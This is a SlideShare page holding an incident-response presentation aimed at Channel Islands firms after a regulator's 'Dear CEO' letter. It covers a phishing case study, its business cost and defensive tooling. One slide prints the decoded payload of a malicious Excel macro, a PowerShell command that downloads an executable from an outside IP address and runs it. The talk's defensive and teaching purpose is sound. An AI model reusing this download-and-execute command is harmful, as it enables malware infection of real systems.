SlideShare une entreprise Scribd logo
1  sur  23
Up your Game
In the wake of Dear CEO
Who am I
• Security Team Lead @ Logicalis Jersey
• Incorporated Engineer (IEng) / Chartered IT professional (CITP)
• Channel Island s Information Security Forum (CIISF) founder
• Secretary British Computer Society Jersey
• My role is a mixture of offense and defence for clients of all
sizes and verticals including forensic malware investigations.
How we got here
“We expect that registered persons will take appropriate steps
to properly manage their cyber security arrangements”
cyber-security arrangements”
The Boards of Directors (or equivalent) of registered persons
will take overall responsibility for ensuring that their firm
adequately addresses cyber security risks
A registered person should:
• Understand (and document) the risk of a cyber-attack on their business …
• Have in place appropriate contingency arrangements that they can deploy in
the event of a cyber attack
• Review these matters and test their effectiveness
5 Key Questions – Incident Response
[1] Can we determine how many hosts and when they
talked to the bad domain? How far can we go back in
time to check /prove this?
[2] What information do we have available to us? Logs?
Endpoint protection system?
[3] Did any of the affected hosts communicate with other
network system. If they did, what occurred?
[4] How long did it take us to detect and remedy the
incident
[5] What was the cost to the business?
Incident Response Stages
Preparation
Incident
IdentificationEradication
Recovery
Lessons
Learned
Without information, you
cannot respond!!
The more information that
you have the better your
response.
Effective Incident response is
about being able to pivot
quickly and direct your
response accordingly.
Meet Calculon Inc.
300
100 90
Cayman = 50
BVI = 50
Time = - 5 hours
Jersey = 180
Guernsey =100
London = 20
HK = 40
Kuala Lumpur = 30
Shanghai = 20
Time = +8 hours
Preparation - Threat Model
Threat Vulnerability Impact Business
Impact
Controls
Email Phishing Social
Engineering
Possible
Compromise
System rebuild Logging
Anti Virus
Malvertising
Attack
Outdated Adobe
Flash
Possible
Compromise
System rebuild Ad Blocker
Anti Virus
Web Attack
against
culculon.com
Vulnerability in
web application
stack
Website
compromised
Reputational
Loss
Keep website
stack up to date
DDOS against
Culculon.com
Insufficient
bandwidth
Website not
available
Minor
reputational loss
Consider DDOS
protection
Preparation - Cyber kill chain
“You only have to be fooled once, be slow in
reacting, just once. How are you going to be
sure to never make a mistake? You cant plan for
that. That’s Life”
2016 2016Day 1 2 3 4 5 6 7
Phishing email received
11/11/2016
System cleanup started
11/11/2016
Systems cleanup completed
11/14/2016
11/11/2016 Identify Infected systems
11/11/2016 Delete Citrix users profiles
11/11/2016 Disconnect infected systems from network
11/11/2016 - 11/14/2016 Rebuild infected systems
11/11/2016 Delete email from Exchange server
11/11/2016 Inform BVI/Cayman of the attack
11/14/2016 - 11/16/2016Reporting
11/17/2016Cost of incident
Incident – Malware Attack
Incident – Malware attack
It has code hidden in Excel spreadsheet
When decoded it becomes…..
cmd /K PowerShell.exe (New-Object
System.Net.WebClient).DownloadFile('http://92.63.
88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%JIOiodf
hioIH.cab'); expand %TEMP%JIOiodfhioIH.cab
%TEMP%JIOiodfhioIH.exe; start
%TEMP%JIOiodfhioIH.exe;
VBA macro virus with hidden URL
Incident – Lessons Learned
[1] Insufficent logging available
[2] “Triage” took too long
[4] Volatile Forensic data lost
[3] Lack of support skills in outside UK locations
[5] USB / DLP / Drive Encryption made analysis difficult
[6] AV showed no infection / Incident response tools
showed no malicious processes
[7] Reporting took too long
Incident 1 – Business Cost
25 who clicked email phish
Citrix = 12
Various
Locations
Jersey,
Guernsey
and
London
KL Calculon partner
HK Calculon senior
executive
12 x Citrix Users - £150 per hour – 6 Hours = £3,600
9 x Citrix Users - £200 per hour – 10 Hours = £18,000
4 x Citrix Users - £400 per hour – 5 Hours = £8,000
IT support Costs = £2,000
Total Cost = £31,600
Improving Our Response – Passive DNS
https://blog.redcanary.com/2015/07/02/passive-dns-monitoring-your-ir-team-needs-it/
[1] Cheap to setup
[2] Use ‘Bro’ with Intel
Critical Stack
https://nullsecure.org/building-your-own-passivedns-feed/
[3] Solves Question 1
Endpoint Logging
[1] Level One
• User logins / logoff events
• User Account creation, deletion and modification
[2] Level Two
• Process creation / termination on systems
• Use of sensitive privileges
[3] Must Have
• Logs must be stored centrally – avoids anti forensics clearing of logs
• Available for historic querying and hunting of suspicious activity
Endpoint Forensics
[1] Directly examine the memory
• Not susceptible to malware tampering.
• More information available – malware can’t hide.
[2] Scalability
• We need to be able to ask questions of systems remotely.
• Allows us to pivot and focus on what needs to “get done” in an incident.
[3] Memory Samples
• Contain information as well as disk artefacts.
• Existing “Live IR” tools are insufficient.
Threat Hunting = Endpoint Logging + Forensics + Netflow
ELK Stack Explained
ELK Demo
Google Rapid Response
Cross-platform support for
Linux, Mac OS X and
Windows clients.
Live remote memory
analysis and imaging
Powerful search and
download capabilities for
files and the Windows
registry.
Secure communication
infrastructure designed for
Internet deployment.
Detailed monitoring of
client CPU, memory, IO
usage and self-imposed
limits
https://github.com/google/grr
Reporting / Compliance
https://github.com/certsocietegenerale/FIR
Python / Django Web
Application
Open sourced by Societe
Generale Incident Response
Team
Customisable and freely
available to you to record
your incidents in.
GPL V3 licensed – You
can make change for
your own use.
Canaries, Tokens and Honey Hashes
Canary Token: Something you put on your network, if opened you get an email
alert
Canary Device: A honeypot with an internet console that pretends to mimic
something else that creates alerts when accessed.
Honey Hash: A fake NTLM password hash that you put in critical servers to detect Pass The
Hash attacks.
Integrating SIEM into your response
Endpoint logging and forensics
integrated via event collectors
Threat intelligence feeds directly
integrated into SIEM
AV / Next gen AV supported
Passive DNS integrated
Bridging the skills gap
Forensic Images:
http://www.forensicfocus.com/images-and-challenges
Volatility Framework:
http://volatility-labs.blogspot.com/
Incident Response:
http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
Questions
Can your organisation prevent, detect and
respond to cyber security threats that you face?
In an incident could you answer the five key
questions?
@cyberkryption

Contenu connexe

Tendances

Effective Vulnerability Management
Effective Vulnerability ManagementEffective Vulnerability Management
Effective Vulnerability Management
Vicky Ames
 
Implementing Vulnerability Management
Implementing Vulnerability Management Implementing Vulnerability Management
Implementing Vulnerability Management
Argyle Executive Forum
 

Tendances (20)

Incident handling.final
Incident handling.finalIncident handling.final
Incident handling.final
 
Enterprise Class Vulnerability Management Like A Boss
Enterprise Class Vulnerability Management Like A BossEnterprise Class Vulnerability Management Like A Boss
Enterprise Class Vulnerability Management Like A Boss
 
Planning and Deploying an Effective Vulnerability Management Program
Planning and Deploying an Effective Vulnerability Management ProgramPlanning and Deploying an Effective Vulnerability Management Program
Planning and Deploying an Effective Vulnerability Management Program
 
Incident response
Incident responseIncident response
Incident response
 
Effective Vulnerability Management
Effective Vulnerability ManagementEffective Vulnerability Management
Effective Vulnerability Management
 
Vulnerability Assessment
Vulnerability AssessmentVulnerability Assessment
Vulnerability Assessment
 
Patch and Vulnerability Management
Patch and Vulnerability ManagementPatch and Vulnerability Management
Patch and Vulnerability Management
 
Vulnerability Management: How to Think Like a Hacker to Reduce Risk
Vulnerability Management: How to Think Like a Hacker to Reduce RiskVulnerability Management: How to Think Like a Hacker to Reduce Risk
Vulnerability Management: How to Think Like a Hacker to Reduce Risk
 
Implementing Vulnerability Management
Implementing Vulnerability Management Implementing Vulnerability Management
Implementing Vulnerability Management
 
Vulnerability Management V0.1
Vulnerability Management V0.1Vulnerability Management V0.1
Vulnerability Management V0.1
 
OSB130 Patch Management Best Practices
OSB130 Patch Management Best PracticesOSB130 Patch Management Best Practices
OSB130 Patch Management Best Practices
 
Six Steps to SIEM Success
Six Steps to SIEM SuccessSix Steps to SIEM Success
Six Steps to SIEM Success
 
Info Security - Vulnerability Assessment
Info Security - Vulnerability AssessmentInfo Security - Vulnerability Assessment
Info Security - Vulnerability Assessment
 
Web Application Vulnerability Management
Web Application Vulnerability ManagementWeb Application Vulnerability Management
Web Application Vulnerability Management
 
Vulnerability Assessment Presentation
Vulnerability Assessment PresentationVulnerability Assessment Presentation
Vulnerability Assessment Presentation
 
Infocyte Mid-market Threat and Incident Response Report Webinar
Infocyte Mid-market Threat and Incident Response Report WebinarInfocyte Mid-market Threat and Incident Response Report Webinar
Infocyte Mid-market Threat and Incident Response Report Webinar
 
Is Your Vulnerability Management Program Irrelevant?
Is Your Vulnerability Management Program Irrelevant?Is Your Vulnerability Management Program Irrelevant?
Is Your Vulnerability Management Program Irrelevant?
 
10 Steps to Building an Effective Vulnerability Management Program
10 Steps to Building an Effective Vulnerability Management Program10 Steps to Building an Effective Vulnerability Management Program
10 Steps to Building an Effective Vulnerability Management Program
 
IT Security management and risk assessment
IT Security management and risk assessmentIT Security management and risk assessment
IT Security management and risk assessment
 
New USM v5.0 - Get Complete Security Visibility Faster & Easier Than Ever
New USM v5.0 - Get Complete Security Visibility Faster & Easier Than EverNew USM v5.0 - Get Complete Security Visibility Faster & Easier Than Ever
New USM v5.0 - Get Complete Security Visibility Faster & Easier Than Ever
 

En vedette

En vedette (20)

Acts 6:1-7 ~ Organic Growth of the Early Church (pt. 1)
Acts 6:1-7 ~ Organic Growth of the Early Church (pt. 1)Acts 6:1-7 ~ Organic Growth of the Early Church (pt. 1)
Acts 6:1-7 ~ Organic Growth of the Early Church (pt. 1)
 
Nuvola: a tale of migration to AWS
Nuvola: a tale of migration to AWSNuvola: a tale of migration to AWS
Nuvola: a tale of migration to AWS
 
Resume
ResumeResume
Resume
 
Combining sentences with the words although and despite
Combining sentences with the words although and despiteCombining sentences with the words although and despite
Combining sentences with the words although and despite
 
Adaptive Content Show & Tell - Austin Content
Adaptive Content Show & Tell - Austin ContentAdaptive Content Show & Tell - Austin Content
Adaptive Content Show & Tell - Austin Content
 
Bsides Delhi Security Automation for Red and Blue Teams
Bsides Delhi Security Automation for Red and Blue TeamsBsides Delhi Security Automation for Red and Blue Teams
Bsides Delhi Security Automation for Red and Blue Teams
 
B2B Digital Transformation - Case Study
B2B Digital Transformation - Case StudyB2B Digital Transformation - Case Study
B2B Digital Transformation - Case Study
 
Demystifying Security Analytics: Data, Methods, Use Cases
Demystifying Security Analytics: Data, Methods, Use CasesDemystifying Security Analytics: Data, Methods, Use Cases
Demystifying Security Analytics: Data, Methods, Use Cases
 
Heterogenous Persistence
Heterogenous PersistenceHeterogenous Persistence
Heterogenous Persistence
 
Micro Services - Small is Beautiful
Micro Services - Small is BeautifulMicro Services - Small is Beautiful
Micro Services - Small is Beautiful
 
Deploying services: automation with docker and ansible
Deploying services: automation with docker and ansibleDeploying services: automation with docker and ansible
Deploying services: automation with docker and ansible
 
Urban legends - PJ Hagerty - Codemotion Amsterdam 2017
Urban legends - PJ Hagerty - Codemotion Amsterdam 2017Urban legends - PJ Hagerty - Codemotion Amsterdam 2017
Urban legends - PJ Hagerty - Codemotion Amsterdam 2017
 
Composite çelik
Composite çelikComposite çelik
Composite çelik
 
Journey of The Connected Enterprise - Knowledge Graphs - Smart Data
Journey of The Connected Enterprise - Knowledge Graphs - Smart DataJourney of The Connected Enterprise - Knowledge Graphs - Smart Data
Journey of The Connected Enterprise - Knowledge Graphs - Smart Data
 
Microservices
MicroservicesMicroservices
Microservices
 
AWS Cost Visualizer
AWS Cost VisualizerAWS Cost Visualizer
AWS Cost Visualizer
 
Failing at Scale - PNWPHP 2016
Failing at Scale - PNWPHP 2016Failing at Scale - PNWPHP 2016
Failing at Scale - PNWPHP 2016
 
Docker for PHP Developers - Madison PHP 2017
Docker for PHP Developers - Madison PHP 2017Docker for PHP Developers - Madison PHP 2017
Docker for PHP Developers - Madison PHP 2017
 
Turnkey Riak KV Cluster
Turnkey Riak KV ClusterTurnkey Riak KV Cluster
Turnkey Riak KV Cluster
 
Teaching for Peace, Renewing the Spirit - TESOL 2014
Teaching for Peace, Renewing the Spirit - TESOL 2014Teaching for Peace, Renewing the Spirit - TESOL 2014
Teaching for Peace, Renewing the Spirit - TESOL 2014
 

Similaire à Incident Response in the wake of Dear CEO

Elizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unisonElizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unison
DevSecCon
 
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNetworking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
North Texas Chapter of the ISSA
 

Similaire à Incident Response in the wake of Dear CEO (20)

LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR Overview
 
New Horizons SCYBER Presentation
New Horizons SCYBER PresentationNew Horizons SCYBER Presentation
New Horizons SCYBER Presentation
 
Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015
 
DIY guide to runbooks, incident reports, and incident response
DIY guide to runbooks, incident reports, and incident responseDIY guide to runbooks, incident reports, and incident response
DIY guide to runbooks, incident reports, and incident response
 
Securing Your Intellectual Property: Preventing Business IP Leaks
Securing Your Intellectual Property: Preventing Business IP LeaksSecuring Your Intellectual Property: Preventing Business IP Leaks
Securing Your Intellectual Property: Preventing Business IP Leaks
 
UCloud Asia Company Presentation
UCloud Asia Company PresentationUCloud Asia Company Presentation
UCloud Asia Company Presentation
 
UCloud Asia Company Presentation - How to prevent Ransomware and Phishing att...
UCloud Asia Company Presentation - How to prevent Ransomware and Phishing att...UCloud Asia Company Presentation - How to prevent Ransomware and Phishing att...
UCloud Asia Company Presentation - How to prevent Ransomware and Phishing att...
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
 
Avoid These Top 15 IT Security Threats
Avoid These Top 15 IT Security ThreatsAvoid These Top 15 IT Security Threats
Avoid These Top 15 IT Security Threats
 
Chaos Engineering: Why the World Needs More Resilient Systems
Chaos Engineering: Why the World Needs More Resilient SystemsChaos Engineering: Why the World Needs More Resilient Systems
Chaos Engineering: Why the World Needs More Resilient Systems
 
Elizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unisonElizabeth Lawler - Devops, security, and compliance working in unison
Elizabeth Lawler - Devops, security, and compliance working in unison
 
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNetworking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
 
Security Awareness Training by Fortinet
Security Awareness Training by FortinetSecurity Awareness Training by Fortinet
Security Awareness Training by Fortinet
 
2015 Cyber Security
2015 Cyber Security2015 Cyber Security
2015 Cyber Security
 
Setting up CSIRT
Setting up CSIRTSetting up CSIRT
Setting up CSIRT
 
APT & What we can do TODAY
APT & What we can do TODAYAPT & What we can do TODAY
APT & What we can do TODAY
 
The Avoidable Risks of Remote Working
The Avoidable Risks of Remote WorkingThe Avoidable Risks of Remote Working
The Avoidable Risks of Remote Working
 
Offensive malware usage and defense
Offensive malware usage and defenseOffensive malware usage and defense
Offensive malware usage and defense
 
Top 25 SOC Analyst interview questions that You Should Know.pptx
Top 25 SOC Analyst interview questions that You Should Know.pptxTop 25 SOC Analyst interview questions that You Should Know.pptx
Top 25 SOC Analyst interview questions that You Should Know.pptx
 
Behind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced ThreatsBehind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced Threats
 

Plus de Paul Dutot IEng MIET MBCS CITP OSCP CSTM

Plus de Paul Dutot IEng MIET MBCS CITP OSCP CSTM (10)

Welcome to the #WannaCry Wine Club
Welcome to the #WannaCry Wine ClubWelcome to the #WannaCry Wine Club
Welcome to the #WannaCry Wine Club
 
Scanning Channel Islands Cyberspace
Scanning Channel Islands Cyberspace Scanning Channel Islands Cyberspace
Scanning Channel Islands Cyberspace
 
Logicalis Security Conference
Logicalis Security ConferenceLogicalis Security Conference
Logicalis Security Conference
 
Letter anonymous-II
Letter anonymous-IILetter anonymous-II
Letter anonymous-II
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflows
 
Practical Cyber Defense
Practical Cyber DefensePractical Cyber Defense
Practical Cyber Defense
 
A Letter from Anonymous to the Jersey Finance Industry
A Letter from Anonymous to the Jersey Finance IndustryA Letter from Anonymous to the Jersey Finance Industry
A Letter from Anonymous to the Jersey Finance Industry
 
Infosec lecture-final
Infosec lecture-finalInfosec lecture-final
Infosec lecture-final
 
Path to Surfdroid
Path to SurfdroidPath to Surfdroid
Path to Surfdroid
 
WI-FI Security in Jersey 2011
WI-FI Security in Jersey 2011WI-FI Security in Jersey 2011
WI-FI Security in Jersey 2011
 

Dernier

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 

Dernier (20)

DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 

Incident Response in the wake of Dear CEO

  • 1. Up your Game In the wake of Dear CEO
  • 2. Who am I • Security Team Lead @ Logicalis Jersey • Incorporated Engineer (IEng) / Chartered IT professional (CITP) • Channel Island s Information Security Forum (CIISF) founder • Secretary British Computer Society Jersey • My role is a mixture of offense and defence for clients of all sizes and verticals including forensic malware investigations.
  • 3. How we got here “We expect that registered persons will take appropriate steps to properly manage their cyber security arrangements” cyber-security arrangements” The Boards of Directors (or equivalent) of registered persons will take overall responsibility for ensuring that their firm adequately addresses cyber security risks A registered person should: • Understand (and document) the risk of a cyber-attack on their business … • Have in place appropriate contingency arrangements that they can deploy in the event of a cyber attack • Review these matters and test their effectiveness
  • 4. 5 Key Questions – Incident Response [1] Can we determine how many hosts and when they talked to the bad domain? How far can we go back in time to check /prove this? [2] What information do we have available to us? Logs? Endpoint protection system? [3] Did any of the affected hosts communicate with other network system. If they did, what occurred? [4] How long did it take us to detect and remedy the incident [5] What was the cost to the business?
  • 5. Incident Response Stages Preparation Incident IdentificationEradication Recovery Lessons Learned Without information, you cannot respond!! The more information that you have the better your response. Effective Incident response is about being able to pivot quickly and direct your response accordingly.
  • 6. Meet Calculon Inc. 300 100 90 Cayman = 50 BVI = 50 Time = - 5 hours Jersey = 180 Guernsey =100 London = 20 HK = 40 Kuala Lumpur = 30 Shanghai = 20 Time = +8 hours
  • 7. Preparation - Threat Model Threat Vulnerability Impact Business Impact Controls Email Phishing Social Engineering Possible Compromise System rebuild Logging Anti Virus Malvertising Attack Outdated Adobe Flash Possible Compromise System rebuild Ad Blocker Anti Virus Web Attack against culculon.com Vulnerability in web application stack Website compromised Reputational Loss Keep website stack up to date DDOS against Culculon.com Insufficient bandwidth Website not available Minor reputational loss Consider DDOS protection
  • 8. Preparation - Cyber kill chain “You only have to be fooled once, be slow in reacting, just once. How are you going to be sure to never make a mistake? You cant plan for that. That’s Life”
  • 9. 2016 2016Day 1 2 3 4 5 6 7 Phishing email received 11/11/2016 System cleanup started 11/11/2016 Systems cleanup completed 11/14/2016 11/11/2016 Identify Infected systems 11/11/2016 Delete Citrix users profiles 11/11/2016 Disconnect infected systems from network 11/11/2016 - 11/14/2016 Rebuild infected systems 11/11/2016 Delete email from Exchange server 11/11/2016 Inform BVI/Cayman of the attack 11/14/2016 - 11/16/2016Reporting 11/17/2016Cost of incident Incident – Malware Attack
  • 10. Incident – Malware attack It has code hidden in Excel spreadsheet When decoded it becomes….. cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63. 88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%JIOiodf hioIH.cab'); expand %TEMP%JIOiodfhioIH.cab %TEMP%JIOiodfhioIH.exe; start %TEMP%JIOiodfhioIH.exe; VBA macro virus with hidden URL
  • 11. Incident – Lessons Learned [1] Insufficent logging available [2] “Triage” took too long [4] Volatile Forensic data lost [3] Lack of support skills in outside UK locations [5] USB / DLP / Drive Encryption made analysis difficult [6] AV showed no infection / Incident response tools showed no malicious processes [7] Reporting took too long
  • 12. Incident 1 – Business Cost 25 who clicked email phish Citrix = 12 Various Locations Jersey, Guernsey and London KL Calculon partner HK Calculon senior executive 12 x Citrix Users - £150 per hour – 6 Hours = £3,600 9 x Citrix Users - £200 per hour – 10 Hours = £18,000 4 x Citrix Users - £400 per hour – 5 Hours = £8,000 IT support Costs = £2,000 Total Cost = £31,600
  • 13. Improving Our Response – Passive DNS https://blog.redcanary.com/2015/07/02/passive-dns-monitoring-your-ir-team-needs-it/ [1] Cheap to setup [2] Use ‘Bro’ with Intel Critical Stack https://nullsecure.org/building-your-own-passivedns-feed/ [3] Solves Question 1
  • 14. Endpoint Logging [1] Level One • User logins / logoff events • User Account creation, deletion and modification [2] Level Two • Process creation / termination on systems • Use of sensitive privileges [3] Must Have • Logs must be stored centrally – avoids anti forensics clearing of logs • Available for historic querying and hunting of suspicious activity
  • 15. Endpoint Forensics [1] Directly examine the memory • Not susceptible to malware tampering. • More information available – malware can’t hide. [2] Scalability • We need to be able to ask questions of systems remotely. • Allows us to pivot and focus on what needs to “get done” in an incident. [3] Memory Samples • Contain information as well as disk artefacts. • Existing “Live IR” tools are insufficient. Threat Hunting = Endpoint Logging + Forensics + Netflow
  • 18. Google Rapid Response Cross-platform support for Linux, Mac OS X and Windows clients. Live remote memory analysis and imaging Powerful search and download capabilities for files and the Windows registry. Secure communication infrastructure designed for Internet deployment. Detailed monitoring of client CPU, memory, IO usage and self-imposed limits https://github.com/google/grr
  • 19. Reporting / Compliance https://github.com/certsocietegenerale/FIR Python / Django Web Application Open sourced by Societe Generale Incident Response Team Customisable and freely available to you to record your incidents in. GPL V3 licensed – You can make change for your own use.
  • 20. Canaries, Tokens and Honey Hashes Canary Token: Something you put on your network, if opened you get an email alert Canary Device: A honeypot with an internet console that pretends to mimic something else that creates alerts when accessed. Honey Hash: A fake NTLM password hash that you put in critical servers to detect Pass The Hash attacks.
  • 21. Integrating SIEM into your response Endpoint logging and forensics integrated via event collectors Threat intelligence feeds directly integrated into SIEM AV / Next gen AV supported Passive DNS integrated
  • 22. Bridging the skills gap Forensic Images: http://www.forensicfocus.com/images-and-challenges Volatility Framework: http://volatility-labs.blogspot.com/ Incident Response: http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
  • 23. Questions Can your organisation prevent, detect and respond to cyber security threats that you face? In an incident could you answer the five key questions? @cyberkryption